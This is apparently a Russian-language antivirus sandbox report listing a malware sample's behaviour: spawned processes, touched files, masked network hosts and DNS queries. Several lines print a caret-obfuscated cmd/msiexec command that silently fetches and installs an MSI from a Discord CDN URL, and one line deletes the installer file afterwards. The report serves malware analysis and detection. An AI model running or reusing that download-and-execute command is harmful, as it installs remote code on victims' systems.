Техническая информация
- '<SYSTEM32>\cmd.exe' /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn
- %WINDIR%\explorer.exe
- iexplore.exe
- Процесс iexplore.exe, модуль wininet.dll
- Процесс firefox.exe, модуль nss3.dll
- %BOOT_VOL%\boot\bcd.log
- %BOOT_VOL%\boot\bcd
- %TEMP%\nsyd02b.tmp
- %TEMP%\64cgbfdn23gia0
- %TEMP%\h5zr3pu7px
- %TEMP%\nsyd07a.tmp\5rov.dll
- %WINDIR%\installer\msicf52.tmp
- %LOCALAPPDATA%\microsoft\windows\usrclass.dat.log1
- %LOCALAPPDATA%\microsoft\windows\usrclass.dat
- 'cd#.##scordapp.com':443
- 'af#######ebathroomsarizona.com':80
- 'pr###12580.com':80
- 'ia##c.com':80
- 'cd#.##scordapp.com':443
- DNS ASK cd#.##scordapp.com
- DNS ASK af#######ebathroomsarizona.com
- DNS ASK ok######sundayschool.com
- DNS ASK pr###12580.com
- DNS ASK ia##c.com
- DNS ASK bj##ygg.com
- '%WINDIR%\installer\msicf52.tmp'
- '<SYSTEM32>\cmd.exe' /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn' (со скрытым окном)
- '<SYSTEM32>\msiexec.exe' /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn
- '%WINDIR%\syswow64\wuapp.exe'
- '%WINDIR%\syswow64\cmd.exe' del "%WINDIR%\Installer\MSICF52.tmp"